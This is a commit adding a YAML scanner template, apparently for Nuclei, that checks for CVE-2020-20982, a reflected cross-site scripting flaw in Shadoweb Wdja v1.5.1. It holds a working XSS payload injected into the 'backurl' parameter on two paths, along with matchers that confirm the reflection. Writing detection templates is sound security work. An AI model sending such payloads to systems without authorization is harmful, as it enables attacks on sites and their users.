Create CVE-2020-20982.yaml

cves/2020/CVE-2020-20982.yaml

@@ -0,0 +1,28 @@
+id: CVE-2020-20982
+
+info:
+  name: Shadoweb Wdja v1.5.1 xss
+  author: pikpikcu
+  severity: medium
+  tags: cve,cve2020,xss,wdja
+  reference:
+    - https://github.com/shadoweb/wdja/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
+      - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        words:
+          - 'alert(document.domain);//'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'